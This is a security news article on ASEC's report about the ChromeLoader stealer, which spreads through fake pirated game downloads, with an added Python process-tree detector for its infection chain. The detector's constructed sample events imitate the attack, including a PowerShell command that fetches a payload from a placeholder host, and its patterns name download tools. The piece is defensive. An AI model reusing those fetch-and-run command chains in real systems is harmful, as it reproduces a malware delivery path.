Beware pirated video game downloads, as they could be malware in disguise. According to a report by AhnLab Security Emergency Response Center (ASEC), a browser-hijacking credential stealer called ChromeLoader has evolved and is now capable of stealing data, deploying ransomware, and more.
ChromeLoader first appeared in January of 2022, grew in deployment volume in May of last year, and then in September VMware reported seeing new variants popping up. It is distributed via a variety of malvertising sites that host the malicious files, presenting them to users as free downloads of pirated games. Once downloaded, the malware presents itself as an install.lnk file; opening it executes a batch script that decompresses a .zip archive and then runs a data.ini file along with a couple of scripts that retrieve the payload.
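The infection chain above lends itself to a process-tree heuristic: a shortcut-launched batch script, a .zip extraction, a data.ini reference and a payload fetch all hanging off one parent process. The following is an added example (not ASEC's detection logic or any of their indicators) that scores constructed Sysmon-style process-creation events; the specific tool names it matches (tar.exe, expand.exe, Expand-Archive, Invoke-WebRequest) and the sample command lines are assumptions, not details from the report.

```python
import re
from collections import defaultdict

# Heuristic stage patterns drawn from the chain described in the post.
# Tool names are assumptions: the post does not say which utilities are used.
STAGES = {
    "shortcut_batch": re.compile(r"install\.lnk|\.bat\b", re.I),
    "zip_extract": re.compile(r"\b(tar|expand|Expand-Archive)\b.*\.zip\b", re.I),
    "data_ini": re.compile(r"\bdata\.ini\b", re.I),
    "payload_fetch": re.compile(r"Invoke-WebRequest|DownloadString|\bcurl\b", re.I),
}
ALERT_THRESHOLD = 2  # distinct stages seen under one process tree

# Constructed events (pid, ppid, image, command line), not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe", "cmdline": r'cmd.exe /c "E:\launcher.bat"'},
    {"pid": 201, "ppid": 200, "image": "tar.exe", "cmdline": r"tar.exe -xf E:\game.zip -C %TEMP%\g"},
    {"pid": 202, "ppid": 200, "image": "cmd.exe", "cmdline": r"cmd.exe /c %TEMP%\g\data.ini"},
    {"pid": 203, "ppid": 202, "image": "powershell.exe",
     "cmdline": 'powershell.exe -c "Invoke-WebRequest https://example.invalid/p"'},
    # Benign tree: a user extracting a photo archive, one stage only.
    {"pid": 300, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 301, "ppid": 300, "image": "tar.exe", "cmdline": r"tar.exe -xf C:\Users\a\photos.zip"},
]


def root_of(pid, parents):
    """Walk up ppid links while the parent is itself a known event."""
    seen = set()
    while pid not in seen and parents.get(pid) in parents:
        seen.add(pid)
        pid = parents[pid]
    return pid


def score_trees(events):
    """Return {root_pid: sorted stage names} for every process tree with a hit."""
    parents = {e["pid"]: e["ppid"] for e in events}
    hits = defaultdict(set)
    for e in events:
        for name, pat in STAGES.items():
            if pat.search(e["cmdline"]):
                hits[root_of(e["pid"], parents)].add(name)
    return {root: sorted(stages) for root, stages in hits.items()}


def suspicious_trees(events):
    """Only trees that show at least ALERT_THRESHOLD distinct stages."""
    return {r: s for r, s in score_trees(events).items() if len(s) >= ALERT_THRESHOLD}


if __name__ == "__main__":
    for root, stages in suspicious_trees(SAMPLE_EVENTS).items():
        print(f"tree rooted at pid {root}: {', '.join(stages)}")
```

Single-stage matches such as an ordinary archive extraction are left alone; only a tree that accumulates several of the described stages is raised.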
The malware is set up as a Chrome extension, which will then redirect a user to advert sites to generate income for the malicious operators while also stealing data and potentially downloading ransomware. Originally, it was distributed as an ISO file, but this has recently changed to a VHD (Virtual Hard Disk) file which is easier to mount on a Windows system and is also supported in VMs.
The game titles it is currently using include Elden Ring, Roblox, Red Dead Redemption 2, Need for Speed, Call of Duty, Portal 2, Minecraft, Pokémon, Mario Kart, Dark Souls 3, Animal Crossing and The Legend of Zelda, plus many paid software titles including Photoshop and Microsoft Office. ASEC includes indicators of compromise in their post, and users can avoid this malware by not downloading pirated software.